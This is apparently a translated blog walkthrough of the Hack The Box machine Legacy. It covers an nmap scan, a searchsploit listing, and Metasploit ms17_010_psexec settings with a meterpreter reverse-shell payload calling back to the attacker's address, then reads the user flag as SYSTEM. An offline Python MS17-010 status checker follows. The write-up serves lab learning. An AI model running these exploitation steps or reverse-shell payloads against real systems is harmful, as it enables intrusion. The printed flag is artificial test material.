This is the second of the Retired Machines. The earlier targets were all fairly simple; they are mostly acclimatisation exercises where finding the right entry point is enough.
0x00 Target overview
Legacy is a Windows target; the machines we worked on from Vulnhub before were basically all Linux, so let's see what this one looks like.
First, the machine's details:
0x01 Port scan
Next, a port scan to see which services are exposed. Note that -T5 is the most aggressive timing template; over a VPN link with roughly 370 ms of latency like this one it can silently drop ports, so -T4 is the safer default. Here it was good enough:
root@kali:~# nmap -T5 -A -v 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-31 20:12 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Initiating NSE at 20:12
Completed NSE at 20:12, 0.00s elapsed
Initiating Ping Scan at 20:12
Scanning 10.10.10.4 [4 ports]
Completed Ping Scan at 20:12, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:12
Completed Parallel DNS resolution of 1 host. at 20:12, 0.10s elapsed
Initiating SYN Stealth Scan at 20:12
Scanning 10.10.10.4 [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 20:13, 26.88s elapsed (1000 total ports)
Initiating Service scan at 20:13
Scanning 2 services on 10.10.10.4
Completed Service scan at 20:13, 7.32s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Initiating Traceroute at 20:13
Completed Traceroute at 20:13, 0.46s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:13
Completed Parallel DNS resolution of 2 hosts. at 20:13, 0.42s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 20:13
Completed NSE at 20:14, 52.52s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.37s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows Server 2003 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h58m22s, deviation: 1h24m50s, median: 4d23h58m22s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4e:64 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-02-06T05:11:41+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 442.76 ms 10.10.14.1
2 442.94 ms 10.10.10.4
NSE: Script Post-scanning.
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Initiating NSE at 20:14
Completed NSE at 20:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.82 seconds
Raw packets sent: 3081 (138.976KB) | Rcvd: 56 (3.072KB)
0x02 SMB service
Only 139 and 445 are open and the operating system is Windows XP (the heading says Samba out of habit, but Samba is the Unix implementation; this is Microsoft's own SMB server). The NSE results deserve a second look: smb-os-discovery reports Windows XP (Windows 2000 LAN Manager), the SMB2 negotiation fails so the server only speaks SMBv1, message signing is disabled, and the host script ran with the guest account, so a null session is accepted. An unpatched XP box exposing SMBv1 is bound to have exploitable bugs; here is a quick look at how to search for them. The query below is deliberately broad (searching for "smb" also matches VLC, Samba clients and the like); narrowing it with the OS name or the bulletin number, e.g. searchsploit ms17-010, gives a much shorter list.
root@kali:~# searchsploit smb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow | exploits/osx/local/4759.c
CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC) | exploits/windows/dos/39452.txt
Ethereal 0.x - Multiple iSNS / SMB / SNMP Protocol Dissector Vulnerabilities | exploits/linux/remote/24259.c
LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass | exploits/cgi/webapps/29761.txt
Links 1.00pre12 - 'smbclient' Remote Code Execution | exploits/multiple/remote/2784.html
Links_ ELinks 'smbclient' - Remote Command Execution | exploits/linux/remote/29033.html
Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass | exploits/linux/local/27766.txt
Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Overflow | exploits/linux/remote/89.c
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054) | exploits/windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit) | exploits/windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service | exploits/windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | exploits/windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011) | exploits/windows/dos/1065.c
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) | exploits/windows/dos/6463.rb
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) | exploits/windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) | exploits/windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | exploits/windows/remote/16363.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137) | exploits/windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006) | exploits/windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit) | exploits/windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | exploits/windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service | exploits/windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068) | exploits/windows/remote/7125.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC) | exploits/windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation | exploits/windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow | exploits/windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution | exploits/windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution | exploits/windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) | exploits/windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service | exploits/windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal | exploits/windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client | exploits/windows/remote/19197.txt
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation | exploits/windows/dos/43517.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063) | exploits/windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030) | exploits/windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) | exploits/windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2) | exploits/windows/dos/21747.txt
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow | exploits/hardware/remote/44290.py
Netware - SMB Remote Stack Overflow (PoC) | exploits/novell/dos/13906.txt
SMBlog 1.2 - Arbitrary PHP Command Execution | exploits/php/webapps/27340.txt
SQL-Ledger 2.6.x/LedgerSMB 1.0 - 'Terminal' Directory Traversal | exploits/cgi/webapps/28514.txt
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | exploits/multiple/dos/5712.pl
Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure | exploits/hardware/webapps/38004.txt
SmbClientParser 2.7 Perl Module - Remote Command Execution | exploits/multiple/remote/32084.txt
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit) | exploits/windows_x86/local/16678.rb
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow | exploits/windows/remote/9303.c
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow | exploits/windows/remote/9318.py
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC) | exploits/windows/dos/9029.rb
VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC) | exploits/windows/dos/9427.py
VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow | exploits/windows/remote/9816.py
VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC) | exploits/windows/dos/10333.py
VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC) | exploits/windows/dos/14892.py
Visale 1.0 - 'pblsmb.cgi?listno' Cross-Site Scripting | exploits/cgi/webapps/27681.txt
ZYXEL Router 3.40 Zynos - SMB Data Handling Denial of Service | exploits/hardware/dos/29767.txt
foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution | exploits/multiple/remote/36013.txt
smbftpd 0.96 - SMBDirList-function Remote Format String | exploits/linux/remote/4478.c
smbind 0.4.7 - SQL Injection | exploits/php/webapps/14884.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
0x03 EternalBlue
I'll go with the best-known one, MS17-010 "EternalBlue". One correction to the name, though: the module used below is exploit/windows/smb/ms17_010_psexec, which implements the EternalRomance/EternalSynergy/EternalChampion technique from the same bulletin (entry 43970.rb in the searchsploit output above), not exploit/windows/smb/ms17_010_eternalblue. The psexec variant is the one that works against Windows XP and Server 2003; the EternalBlue module targets Windows 7/Server 2008 R2 and later. Before firing any exploit it is worth confirming the host is unpatched with auxiliary/scanner/smb/smb_ms17_010 (or nmap's smb-vuln-ms17-010 script). Open msf, set RHOSTS to 10.10.10.4 and LHOST to the address of the VPN interface (10.10.14.20 here), and the options look like this:
msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Once the module runs we get a Meterpreter session. Because ms17_010_psexec launches the payload as a service over the ADMIN$ share, the shell already runs as SYSTEM, so the user flag can be read straight away without a separate privilege-escalation step:
meterpreter > shell
Process 444 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>type "c:\Documents and Settings\john\Desktop\user.txt"
type "c:\Documents and Settings\john\Desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f
C:\WINDOWS\system32>
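As an added example, not code from the original post, from nmap or from Metasploit, the following Python shows what sits behind two of the results relied on above. The smb-security-mode fields nmap printed in 0x01 (user-level authentication, challenge/response supported, signing disabled) come straight out of the SMBv1 negotiate response, and the MS17-010 scanner that should run before ms17_010_psexec (auxiliary/scanner/smb/smb_ms17_010, or nmap's smb-vuln-ms17-010) decides by the NT status code returned to a Transaction/PeekNamedPipe request on IPC$ with FID 0: STATUS_INSUFF_SERVER_RESOURCES (0xC0000205) means unpatched, STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED means patched. The anonymous Session Setup and Tree Connect that precede the probe are omitted; the two server replies are constructed for the demo rather than captured from 10.10.10.4, and nothing is sent over the network.

```python
"""SMBv1 negotiate parsing and the MS17-010 status check, run offline.
Added example for this writeup, not code from the original post, nmap or Metasploit.
The server replies below are constructed for the demo, not captured from 10.10.10.4,
and nothing is sent over the network."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25
SMB_COM_NEGOTIATE = 0x72
HEADER_FMT = "<4sBIBHH8sHHHHH"      # 32-byte SMB1 header
NEG_RESP_FMT = "<BHBHHIIIIQhBH"     # WordCount(17), 17 parameter words, ByteCount
# SecurityMode bits of the NT LM 0.12 negotiate response
SECMODE_USER_LEVEL = 0x01           # user-level rather than share-level auth
SECMODE_CHALLENGE = 0x02            # challenge/response rather than plaintext
SECMODE_SIGN_ENABLED = 0x04
SECMODE_SIGN_REQUIRED = 0x08
CAP_EXTENDED_SECURITY = 0x80000000
# NT status codes returned to the MS17-010 probe (Transaction/PeekNamedPipe on IPC$, FID 0)
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched srv.sys
STATUS_INVALID_HANDLE = 0xC0000008            # patched
STATUS_ACCESS_DENIED = 0xC0000022             # patched


def netbios_wrap(payload):
    """NetBIOS session service header: type 0x00 plus a 3-byte big-endian length."""
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def smb1_header(command, status=0, flags=0x18, flags2=0xC803, tid=0, pid=0xFEFF, uid=0, mid=0):
    """Flags2 0xC803 asks for Unicode, 32-bit NT status codes, extended security and long names."""
    return struct.pack(HEADER_FMT, SMB_MAGIC, command, status, flags, flags2,
                       0, b"\x00" * 8, 0, tid, pid, uid, mid)


def build_negotiate_request(dialects=(b"NT LM 0.12",)):
    """SMB_COM_NEGOTIATE: WordCount 0, then one 0x02-prefixed NUL-terminated string per dialect."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    return netbios_wrap(smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(data)) + data)


def parse_smb1_header(data):
    """Header fields of one SMB1 message (NetBIOS header already stripped)."""
    if len(data) < 32 or data[:4] != SMB_MAGIC:
        raise ValueError("not an SMB1 message")
    _, command, status, flags, flags2, _, _, _, tid, pid, uid, mid = struct.unpack_from(HEADER_FMT, data)
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def parse_negotiate_response(data, offered=(b"NT LM 0.12",)):
    """Dialect, security mode and capabilities, named the way nmap's smb-security-mode reports them."""
    hdr = parse_smb1_header(data)
    if hdr["command"] != SMB_COM_NEGOTIATE or hdr["status"] != 0:
        raise ValueError("negotiate failed: status 0x%08X" % hdr["status"])
    (wordcount, dialect_idx, secmode, _mpx, _vcs, _maxbuf, _maxraw, _key,
     caps, _time, _tz, chal_len, _bytecount) = struct.unpack_from(NEG_RESP_FMT, data, 32)
    if wordcount != 17:
        raise ValueError("unexpected WordCount %d" % wordcount)
    signing = ("required" if secmode & SECMODE_SIGN_REQUIRED
               else "enabled" if secmode & SECMODE_SIGN_ENABLED else "disabled")
    return {
        "dialect": None if dialect_idx == 0xFFFF else offered[dialect_idx].decode(),
        "authentication_level": "user" if secmode & SECMODE_USER_LEVEL else "share",
        "challenge_response": bool(secmode & SECMODE_CHALLENGE),
        "message_signing": signing,
        "extended_security": bool(caps & CAP_EXTENDED_SECURITY),
        # without extended security the 8-byte NTLM challenge directly follows the parameters
        "challenge": data[32 + struct.calcsize(NEG_RESP_FMT):][:chal_len],
    }


def classify_ms17_010_status(status):
    """Verdict for the NT status a server returns to the PeekNamedPipe probe."""
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "likely vulnerable (unpatched MS17-010)"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "not vulnerable (patched)"
    return "inconclusive (0x%08X)" % status


def constructed_negotiate_response():
    """Constructed reply modelled on an XP host: user-level auth, challenge/response, no signing."""
    params = struct.pack(NEG_RESP_FMT, 17, 0, SECMODE_USER_LEVEL | SECMODE_CHALLENGE,
                         50, 1, 16644, 65536, 0, 0x0000F3FD, 0, 0, 8, 16)
    blob = bytes.fromhex("1122334455667788") + "HTB\x00".encode("utf-16-le")  # challenge + domain
    return smb1_header(SMB_COM_NEGOTIATE, flags=0x98) + params + blob


def constructed_peek_response():
    """Constructed error reply an unpatched server sends to the PeekNamedPipe probe."""
    return smb1_header(SMB_COM_TRANSACTION, status=STATUS_INSUFF_SERVER_RESOURCES,
                       flags=0x98, tid=0x0800, uid=0x0800)


def run_checks():
    """Parse both constructed replies; returns (negotiate fields, MS17-010 verdict)."""
    neg = parse_negotiate_response(constructed_negotiate_response())
    verdict = classify_ms17_010_status(parse_smb1_header(constructed_peek_response())["status"])
    return neg, verdict


if __name__ == "__main__":
    print("negotiate request:", build_negotiate_request().hex())
    print(*run_checks(), sep="\n")
```

Run it directly to see the raw negotiate request and the parsed fields. To point it at a real host you would send build_negotiate_request() over a TCP connection to port 445, strip the 4-byte NetBIOS header from the reply before calling parse_negotiate_response, and then issue an anonymous Session Setup AndX and a Tree Connect AndX to IPC$ before sending the PeekNamedPipe probe whose status classify_ms17_010_status interprets.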
Source: CSDN
Author: 3riC5r
Link: https://blog.csdn.net/fastergohome/article/details/104133208